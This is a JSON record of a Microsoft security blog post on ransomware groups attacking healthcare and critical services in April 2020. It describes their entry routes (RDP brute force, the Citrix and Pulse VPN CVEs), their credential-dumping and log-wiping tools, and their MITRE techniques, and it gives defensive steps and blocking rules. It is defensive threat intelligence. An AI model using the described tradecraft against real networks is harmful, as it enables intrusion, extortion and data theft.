{"id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "hash": "f06134eac0feaa2e3919bfab5ec00eb0", "type": "mssecure", "bulletinFamily": "blog", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "published": "2020-04-28T16:00:49", "modified": "2020-04-28T16:00:49", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "reporter": "Eric Avena", "references": [], "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "lastseen": "2020-04-30T23:04:13", "history": [{"bulletin": {"id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "hash": "a5f7e60e34f8278f8711a6d8144e1099", "type": "mssecure", "bulletinFamily": "blog", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of 